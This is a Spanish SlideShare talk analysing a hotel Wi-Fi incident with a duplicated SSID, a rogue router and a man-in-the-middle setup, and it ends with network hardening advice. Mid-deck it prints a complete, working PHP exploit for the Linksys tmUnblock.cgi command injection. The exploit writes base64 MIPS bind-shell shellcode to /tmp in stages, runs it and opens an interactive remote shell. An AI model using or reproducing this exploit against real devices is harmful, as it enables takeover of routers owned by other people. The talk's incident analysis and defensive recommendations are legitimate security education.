SlideShare una empresa de Scribd logo
1 de 87
Disclaimer
●
La ponencia que estas a punto de presenciar en carácter técnico y educativo.
●
Esta presentacion y su contenido fueron realizados con intenciones
educativas basandose en un incidente de seguridad documentado con
autorización de las partes potencialmente afectadas.
●
He preferido mantener en anonimidad la entidad afectada por lo que los
nombres mencionados (si aplica) no deben ser tomados como reales.
● No me hago responsable del uso malintencionado que se le pueda dar a la
informacion brindada.
●
Ninguno de mis clientes o empleadores tienen conocimiento específico ni
colaboraron, de manera directa o indirecta, con la investigación ni el analisis
que será presentado.
Enjoy the ride :)
¿De qué va esta exposición?
● Contexto
● Monitorización de un ataque potencial.
● Especulaciones varias.
● Reconocimiento y encapsulación del espectro de ataque.
● Medidas contraofensivas.
● Especulación e hipótesis sobre el esquema de red.
● Topologias de escenario posibles.
● Reflexiones varias.
● Contramedidas preventivas.
Expectativa
Realidad
¿?
● 2 SSID's “HOJO” y 1 SSID “Cisco42618”
● “Fake” HOJO y Cisco42618 comparten segmento LAN 192.168.1.0 /24 El otro HOJO
entrega 192.168.103.0 /24
● Sobre los dos que comparten IP publica (Y) recibo el mismo escaneo del puertos...
● “Gateway” LAN (192.168.1.1) sniffeando puertos ...
● Mac address TPLink ?!?!
Tramas IEEE 801.11
Estructura
Encabezado MAC : Frame control, version de protocolo, tipo
de trama, BSSID, Origen y Desitino (30 Bytes)
Payload: Data o posible información contenida en las tramas
de management (0 – 2312 Bytes)
FCS: Frame Check Sequence. Verifica la integridad. Cierra la
trama con un calculo de redundancia cliclica cuyo resultado
debe ser de la suma del encabezado MAC y el Payload (4
Bytes)
Tipos Control Frame: Permite el intercambio de infomacion. RTS,
CTS, ACK. Permite una mejor coordinacion entre el uso
compartido y el espectro disponible
Data: Payload, contiene los paquetes TCP o UDP. Como el
limite es de 2312 posiblemente sean fragmentados.
Management: Permiten encontrar otros AP y proveen la
posibilidad de conectarte y desconectarte de un punto de acceso
Management Frames.
Beacons
Probes
Association
Authentication
Open Authentication WPA / WPA2
Dino Zovi
Demo Time
“Alguien parece estar duplicando el SSID de la red del hotel y abriendo
acceso a una red intervenida”
Voy a anotarlo en mi maquina de escribir invisible...
- Declaracion del encargado de no pertenencia del dispositivo: Check
- Verificacion de uso mal intencionado del standard IEEE 802.11g,n: Check
- Falta de dinero para salir de bares esa noche: Check
'Author' =>
[
'Johannes Ullrich', #worm discovery
'Rew', # original exploit
'infodox', # another exploit
'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit
module
'juan vazquez' # minor help with msf module
error_reporting(0);
$host = "192.168.1.1"; // IP objetivo
$port = "8080"; // Puerto objetivo
$vuln = "tmUnblock.cgi"; // hndUnblock.cgi tambien es vulnerable
// msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 X
$shellcode = base64_decode(
"f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA".
"AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA".
"AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV".
"BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/".
"ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ".
"FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI".
"EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw".
"8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB".
"UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P".
"+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp".
"bi9zaA=="
);
// Usar la funcion urlencode() rompe el exploit.
function full_urlencode($string) {
$ret = "";
for($c=0; $c<strlen($string); $c++) {
if($string[$c] != '&')
$ret .= "%".dechex(ord($string[$c]));
else
$ret .= "&";
}
return $ret;
// Si se usa wget se necesitaria que el payload sea accesible por el puerto 80 en la
maquina del atacante. La mejor solución es escribir manualmente el ejecutable con
"echo -en", pero httpd crashea con strings largos, asi que lo vamos a usar igual pero
hay que armarlo por partes :)
// en caso que hayamos tenido una falla previa de ejecucion.
$cleanup = build_packet($host, $port, $vuln, "rm /tmp/c0d3z");
if(!send_packet($host, $port, $cleanup)) die("failn");
else echo "listortin";
//Escribimos el payload en stages de 20 bytes
for($i=0; $i<strlen($shellcode); $i+=20) {
echo "tSending ".$i."/".strlen($shellcode)." bytes... ";
$cmd = "echo -en '";
for($c=$i; $c<$i+20 && $c<strlen($shellcode); $c++) {
$cmd .= "0".decoct(ord($shellcode[$c]));
}
$cmd .= "' >> /tmp/c0d3z";
$cmd = build_packet($host, $port, $vuln, $cmd);
if(!send_packet($host, $port, $cmd)) die("failn");
else echo "sent!n";
usleep(100000);
}
// Lo hacemos ejecutable
echo "tConfiguranding... ";
$config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z");
if(!send_packet($host, $port, $config)) die("failn");
else echo "done!n";
}
// Agregamos los ingredientes HTTP necesarios.
function build_packet($host, $port, $vuln, $payload) {
$exploit = full_urlencode(
"submit_button=&".
"change_action=&".
"submit_type=&".
"action=&".
"commit=0&".
"ttcp_num=2&".
"ttcp_size=2&".
"ttcp_ip=-h `".$payload."`&".
"StartEPI=1"
);
$packet =
"POST /".$vuln." HTTP/1.1rn".
"Host: ".$host."rn".
// Este usuario y contraseña no se chequean ;)
"Authorization: Basic ".base64_encode("admin:cualquiercosa")."rn".
"Content-Type: application/x-www-form-urlencodedrn".
"Content-Length: ".strlen($exploit)."rn".
"rn".
$exploit;
return $packet;
}
function send_packet($host, $port, $packet) {
$socket = fsockopen($host, $port, $errno, $errstr);
if(!$socket) return false;
if(!fwrite($socket, $packet)) return false;
fclose($socket);
return true;
}
echo "Testeando conexión con el target... ";
$socket = fsockopen($host, $port, $errno, $errstr, 30);
if(!$socket) die("failn");
else echo "connected!n";
fclose($socket);
echo "Sending payload... n";
build_payload($host, $port, $vuln, $shellcode);
Sleep(3); // Despacito despacito....
echo "Ejecutando el payload... ";
if(!send_packet($host, $port, build_packet($host, $port, $vuln, "/tmp/c0d3z"))) die("failn");
else echo "done!n";
Sleep(3); // Despacito despacito...
echo "Intento de conexión hacia una shell... ";
$socket = fsockopen($host, 4444, $errno, $errstr, 30);
if(!$socket) die("failn");
else echo "connected!n";
echo "Abriendo shell... n";
while(!feof($socket)) {
$cmd = readline($host."$ ");
if(!empty($cmd)) readline_add_history($cmd);
//Se llega al output.
fwrite($socket, $cmd.";echo xxxEOFxxxn");
$data = "";
do {
$data .= fread($socket, 1);
} while(strpos($data, "xxxEOFxxx") === false && !feof($socket));
echo str_replace("xxxEOFxxx", "", $data);
}
?>
De nuevo...
Gotcha
Man in the Middle Attack.
10.10.0.1 /24
10.10.0.100 /24
|------------------------- [192.168.1.0 /24] –---------------------------|
Pública
Linksys E1200 (Router AP)
¿Quien es el DHCP?
La mañana siguiente ...
LA BOCA DEL TELEFONO IP !!!!
Vamo' a sacar conslusione'
● Los telefonos no se ven en las capturas por lo que deberian
haber estado en otra vlan.
● El switch tiene como gateway el router Cisco “sospechoso” por
lo que, si era propiedad del hotel, pudo ser manipulado post
explotacion o deliberadamente propiedad del/los atacante/s.
---
● El router Cisco es propiedad del atacante.
● Las bocas telefonicas proveen direcciones dentro del pool
192.168.1.0/24 por lo que tanto el dispositivo atacante como el
switch y el servidor de telefonia tienen que compartir Vlan de
gestion. LA NATIVA! Lo cual les da acceso a la red de gestion
del servidor de telefonía.
● El tema ahora es: El switch en la frontera del servidor contra la
patchera hacia los telefonos no se ve en las capturas, por lo que
debe forwardear la vlan nativa y no tener IP de administracion
en la misma sino en otra vlan.
WAN
LAN
(DHCP)
10.10.0.1 /24
10.10.0.100 /24
192.168.1.1 /24
“POC”:
¿Que se puede sacar de todo esto?
●
Un Portal Cautivo no es un método que provea un mecanismo de seguridad para el usuario
aunque “prevenga” el acceso web. La autenticación ya fué realizada sin cifrado previo.
●
La Vlan nativa no tiene que ser propagada por los troncales y mucho menos contener el
segmento de administración de equipos de infraestructura de red.
●
Se deben considerar en ambientes expuestos políticas de cantidad de mac addresses por
puerto (port-security), dhcp snooping y ARP Inspection.
●
Los individuos/companías que consideren que su información es valiosa tienen que optar por
métodos de cifrado y autenticación robustos. WPA/WPA2 en casos particulares con
contraseñas fuertes y el ideal WPA/WPA2 Enterprise con 802.1X y un servidor Radius y AD
seguros son una buen arranque perimetral.
●
Vlan Profiling, IDS, IPS y/o NAC para reforzar los accesos. El BYOD ya llegó :)
●
Los equipos de distribución y acceso deben contar con contraseñas robustas y nunca las que
vienen por defecto. Reforzar los accesos con certificados y llaves RSA.
●
Buena politica de ACL's inter-VLAN.
●
Los equipos de comunicaciones deben ser renovados y actualizados a nivel de versión o
configuración si se considera que pueden estar expuestos a una vulnerabilidad publicada.
●
No hay que realizar ataques mal intencionados. Y si existe algo peor que eso es hacerlo con
herramientas vulnerables.
● Mantener el software del dispositivo/computadora y antivirus
actualizado.
● Prestar atención a alertas de sitios maliciosos y errores de
certificado. Navegar con conciencia :)
● Desactivar la conexion automática a redes conocidas. No
conozco los pasos de todos los telefonos. Googleen! :D
● Identificar patrones de ataque: Muchas redes cercanas con
autenticación abierta, sitios web sin HTTPS.
● Googlear el modelo de tu router acerca de posibles
vulnerabilidades remotas o locales y configurar
adecuadamente, actualizar o renovar el equipo.
● Bloquear el acceso remoto a la gestion web.
Y por ultimo
● Utilizar siempre WPA o WPA2 con contraseñas complejas
(números, mayúsculas, minúsculas, simbolos). Evitar
involucrar numeros de documento, telefono, libreta, pasaporte,
patente del auto, fechas de nacimiento. En muchos casos esta
información ya es de dominio público. Esto solo evita el ataque
por fuerza bruta.
● Utilizar el criterio con los correos electrónicos y elementos
compartidos en redes sociales de gente que no es de
confianza (y de confianza tambien!).
Preguntas?

Más contenido relacionado

La actualidad más candente

Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)Corp. Weapon's
 
Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAPaulo Colomés
 
Seguridad wi fi wep-wpa_wpa2
Seguridad wi fi wep-wpa_wpa2Seguridad wi fi wep-wpa_wpa2
Seguridad wi fi wep-wpa_wpa2TRANS-REFORM S.L
 
Escaneo Y DenegacióN De Servicio
Escaneo Y DenegacióN De ServicioEscaneo Y DenegacióN De Servicio
Escaneo Y DenegacióN De Servicioseguridadutpl
 
Criptografia simetrica
Criptografia simetricaCriptografia simetrica
Criptografia simetricaBaruch Ramos
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
Criptografia simetrica
Criptografia simetricaCriptografia simetrica
Criptografia simetricaTensor
 
Criptografia simetrica
Criptografia simetricaCriptografia simetrica
Criptografia simetricaTensor
 
Encriptacion Asimetrica Y Simetrica
Encriptacion Asimetrica Y SimetricaEncriptacion Asimetrica Y Simetrica
Encriptacion Asimetrica Y SimetricaSHARITO21
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocinaEfren Diaz Gomez
 
Unidad 5 - Criptografía
Unidad 5 - CriptografíaUnidad 5 - Criptografía
Unidad 5 - Criptografíavverdu
 
MéTodos De EncriptacióN
MéTodos De EncriptacióNMéTodos De EncriptacióN
MéTodos De EncriptacióNevelyn
 
Criptografía
CriptografíaCriptografía
CriptografíaNoel Cruz
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasRafael Seg
 
Metodos De Encriptacion 1
Metodos De Encriptacion 1Metodos De Encriptacion 1
Metodos De Encriptacion 1IRIS
 

La actualidad más candente (20)

Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)DHCP Spoofing STP Mangling (CORP. ARMAS)
DHCP Spoofing STP Mangling (CORP. ARMAS)
 
Manual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPAManual para romper contraseñas WEP y WPA
Manual para romper contraseñas WEP y WPA
 
Seguridad wi fi wep-wpa_wpa2
Seguridad wi fi wep-wpa_wpa2Seguridad wi fi wep-wpa_wpa2
Seguridad wi fi wep-wpa_wpa2
 
Escaneo Y DenegacióN De Servicio
Escaneo Y DenegacióN De ServicioEscaneo Y DenegacióN De Servicio
Escaneo Y DenegacióN De Servicio
 
Criptografia simetrica
Criptografia simetricaCriptografia simetrica
Criptografia simetrica
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Cifrado
CifradoCifrado
Cifrado
 
Criptografia simetrica
Criptografia simetricaCriptografia simetrica
Criptografia simetrica
 
Criptografia simetrica
Criptografia simetricaCriptografia simetrica
Criptografia simetrica
 
Encriptacion Asimetrica Y Simetrica
Encriptacion Asimetrica Y SimetricaEncriptacion Asimetrica Y Simetrica
Encriptacion Asimetrica Y Simetrica
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
 
Unidad 5 - Criptografía
Unidad 5 - CriptografíaUnidad 5 - Criptografía
Unidad 5 - Criptografía
 
Encriptacion
EncriptacionEncriptacion
Encriptacion
 
MéTodos De EncriptacióN
MéTodos De EncriptacióNMéTodos De EncriptacióN
MéTodos De EncriptacióN
 
LA CRIPTOGRAFIA
LA CRIPTOGRAFIALA CRIPTOGRAFIA
LA CRIPTOGRAFIA
 
TECNICAS DE HACER CRIPTOGRAFÍA
TECNICAS DE HACER  CRIPTOGRAFÍA TECNICAS DE HACER  CRIPTOGRAFÍA
TECNICAS DE HACER CRIPTOGRAFÍA
 
Criptografía
CriptografíaCriptografía
Criptografía
 
Tecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemasTecnicas avanzadas de penetracion a sistemas
Tecnicas avanzadas de penetracion a sistemas
 
Metodos De Encriptacion 1
Metodos De Encriptacion 1Metodos De Encriptacion 1
Metodos De Encriptacion 1
 

Destacado

Fotos intervenidas a comienzos de la década del 2000
Fotos intervenidas a comienzos de la década del 2000Fotos intervenidas a comienzos de la década del 2000
Fotos intervenidas a comienzos de la década del 2000Osmar Santos
 
Ailə tv nin iptv xidmeti - qisa bazar arasdirmasi
Ailə tv nin iptv xidmeti - qisa bazar arasdirmasiAilə tv nin iptv xidmeti - qisa bazar arasdirmasi
Ailə tv nin iptv xidmeti - qisa bazar arasdirmasiSabir Mashadizade
 
Resurreccio
ResurreccioResurreccio
Resurreccioepujol77
 
деятельность кабинета медиации (от 17.02.17 rus)
деятельность кабинета медиации (от 17.02.17 rus)деятельность кабинета медиации (от 17.02.17 rus)
деятельность кабинета медиации (от 17.02.17 rus)timoxxxa
 
3Com 1.009.917
3Com 1.009.9173Com 1.009.917
3Com 1.009.917savomir
 
Työeläke ja sen perustehtävä sosiaaliturvajärjestelmässä
Työeläke ja sen perustehtävä sosiaaliturvajärjestelmässäTyöeläke ja sen perustehtävä sosiaaliturvajärjestelmässä
Työeläke ja sen perustehtävä sosiaaliturvajärjestelmässäTyöeläkevakuuttajat Tela
 
Temas parcial final regulacion
Temas parcial final regulacionTemas parcial final regulacion
Temas parcial final regulacionYaneth Sil
 
Unidad 1. Introducción a las Sagradas Escrituras
Unidad 1. Introducción a las Sagradas EscriturasUnidad 1. Introducción a las Sagradas Escrituras
Unidad 1. Introducción a las Sagradas EscriturasJaime Quiceno Guerrero
 
Professional powerpoint templates(1)_gayathri.s_ppt
Professional powerpoint templates(1)_gayathri.s_pptProfessional powerpoint templates(1)_gayathri.s_ppt
Professional powerpoint templates(1)_gayathri.s_pptS.Gayathri lakshitha ammu
 
ಬಾಲ್ಯದ
ಬಾಲ್ಯದಬಾಲ್ಯದ
ಬಾಲ್ಯದjaniiree17
 
dual sensor concept January 2015
dual sensor concept January 2015dual sensor concept January 2015
dual sensor concept January 2015Brian OConnor, P.E.
 
Gas de esquistos y la industria plástica latinoamericana
Gas de esquistos y la industria plástica latinoamericanaGas de esquistos y la industria plástica latinoamericana
Gas de esquistos y la industria plástica latinoamericanaJorge Bühler-Vidal
 

Destacado (20)

Fotos intervenidas a comienzos de la década del 2000
Fotos intervenidas a comienzos de la década del 2000Fotos intervenidas a comienzos de la década del 2000
Fotos intervenidas a comienzos de la década del 2000
 
Tarea De Ecuaciones Diferenciales
Tarea De Ecuaciones DiferencialesTarea De Ecuaciones Diferenciales
Tarea De Ecuaciones Diferenciales
 
Ailə tv nin iptv xidmeti - qisa bazar arasdirmasi
Ailə tv nin iptv xidmeti - qisa bazar arasdirmasiAilə tv nin iptv xidmeti - qisa bazar arasdirmasi
Ailə tv nin iptv xidmeti - qisa bazar arasdirmasi
 
Acceso Carnal Violento en Colombia.
Acceso Carnal Violento en Colombia. Acceso Carnal Violento en Colombia.
Acceso Carnal Violento en Colombia.
 
Resurreccio
ResurreccioResurreccio
Resurreccio
 
деятельность кабинета медиации (от 17.02.17 rus)
деятельность кабинета медиации (от 17.02.17 rus)деятельность кабинета медиации (от 17.02.17 rus)
деятельность кабинета медиации (от 17.02.17 rus)
 
Audioforo
AudioforoAudioforo
Audioforo
 
3Com 1.009.917
3Com 1.009.9173Com 1.009.917
3Com 1.009.917
 
Työeläke ja sen perustehtävä sosiaaliturvajärjestelmässä
Työeläke ja sen perustehtävä sosiaaliturvajärjestelmässäTyöeläke ja sen perustehtävä sosiaaliturvajärjestelmässä
Työeläke ja sen perustehtävä sosiaaliturvajärjestelmässä
 
Modulo iii
Modulo iiiModulo iii
Modulo iii
 
Temas parcial final regulacion
Temas parcial final regulacionTemas parcial final regulacion
Temas parcial final regulacion
 
Programa gerencia de proyectos de i&d
Programa gerencia de proyectos de i&d Programa gerencia de proyectos de i&d
Programa gerencia de proyectos de i&d
 
Unidad 1. Introducción a las Sagradas Escrituras
Unidad 1. Introducción a las Sagradas EscriturasUnidad 1. Introducción a las Sagradas Escrituras
Unidad 1. Introducción a las Sagradas Escrituras
 
Professional powerpoint templates(1)_gayathri.s_ppt
Professional powerpoint templates(1)_gayathri.s_pptProfessional powerpoint templates(1)_gayathri.s_ppt
Professional powerpoint templates(1)_gayathri.s_ppt
 
· Principio del vacío ·
· Principio del vacío ·· Principio del vacío ·
· Principio del vacío ·
 
Manual allegro c++
Manual allegro c++Manual allegro c++
Manual allegro c++
 
ಬಾಲ್ಯದ
ಬಾಲ್ಯದಬಾಲ್ಯದ
ಬಾಲ್ಯದ
 
dual sensor concept January 2015
dual sensor concept January 2015dual sensor concept January 2015
dual sensor concept January 2015
 
Gas de esquistos y la industria plástica latinoamericana
Gas de esquistos y la industria plástica latinoamericanaGas de esquistos y la industria plástica latinoamericana
Gas de esquistos y la industria plástica latinoamericana
 
Historia
HistoriaHistoria
Historia
 

Similar a El caso de la habitacion 1020

Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))begolnx
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploitDaniel
 
Auditoría wireless
Auditoría wirelessAuditoría wireless
Auditoría wirelessruben0909
 
Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad WirelessJaime Restrepo
 
Infiltración en una Red Wireless Protegida
Infiltración en una Red Wireless ProtegidaInfiltración en una Red Wireless Protegida
Infiltración en una Red Wireless ProtegidaRebelBangarang
 
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Alonso Caballero
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiConferencias FIST
 
Aircrack ng: comandos básicos
Aircrack ng: comandos básicosAircrack ng: comandos básicos
Aircrack ng: comandos básicosJIvanC
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linuxNick Carter
 
Administración de red servidores y seguridad
Administración de red servidores y seguridadAdministración de red servidores y seguridad
Administración de red servidores y seguridadEmilio
 
Administración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicacionesAdministración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicacionesRodolfo Pilas
 
Tecnologías libres para túneles y VPNs
Tecnologías libres para túneles y VPNsTecnologías libres para túneles y VPNs
Tecnologías libres para túneles y VPNsRodolfo Pilas
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]RootedCON
 

Similar a El caso de la habitacion 1020 (20)

Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))
 
Airbase y KARMetasploit
Airbase y KARMetasploitAirbase y KARMetasploit
Airbase y KARMetasploit
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Auditoría wireless
Auditoría wirelessAuditoría wireless
Auditoría wireless
 
Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad Wireless
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Infiltración en una Red Wireless Protegida
Infiltración en una Red Wireless ProtegidaInfiltración en una Red Wireless Protegida
Infiltración en una Red Wireless Protegida
 
Hx c29
Hx c29Hx c29
Hx c29
 
Infiltración en una red wireless protegida
Infiltración en una red wireless protegidaInfiltración en una red wireless protegida
Infiltración en una red wireless protegida
 
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
 
Aircrack ng: comandos básicos
Aircrack ng: comandos básicosAircrack ng: comandos básicos
Aircrack ng: comandos básicos
 
Spectre y Meltdown; Que debemos saber
Spectre y Meltdown; Que debemos saberSpectre y Meltdown; Que debemos saber
Spectre y Meltdown; Que debemos saber
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linux
 
Administración de red servidores y seguridad
Administración de red servidores y seguridadAdministración de red servidores y seguridad
Administración de red servidores y seguridad
 
Administración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicacionesAdministración de llaves SSH para aplicaciones
Administración de llaves SSH para aplicaciones
 
Tecnologías libres para túneles y VPNs
Tecnologías libres para túneles y VPNsTecnologías libres para túneles y VPNs
Tecnologías libres para túneles y VPNs
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
 

Último

La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxJOSEMANUELHERNANDEZH11
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofJuancarlosHuertasNio1
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
Proyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptxProyecto integrador. Las TIC en la sociedad S4.pptx
Proyecto integrador. Las TIC en la sociedad S4.pptx241521559
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...
El gusano informático Morris (1988) - Julio Ardita (1995) - Citizenfour (2014...JaquelineJuarez15
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...
Instrumentación Hoy_ INTERPRETAR EL DIAGRAMA UNIFILAR GENERAL DE UNA PLANTA I...AlanCedillo9
 
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE  DE TECNOLOGIA E INFORMATICA PRIMARIACLASE  DE TECNOLOGIA E INFORMATICA PRIMARIA
CLASE DE TECNOLOGIA E INFORMATICA PRIMARIAWilbisVega
 
Global Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricGlobal Azure Lima 2024 - Integración de Datos con Microsoft Fabric
Global Azure Lima 2024 - Integración de Datos con Microsoft FabricKeyla Dolores Méndez
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersIván López Martín
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
guía de registro de slideshare por Brayan Joseph
guía de registro de slideshare por Brayan Josephguía de registro de slideshare por Brayan Joseph
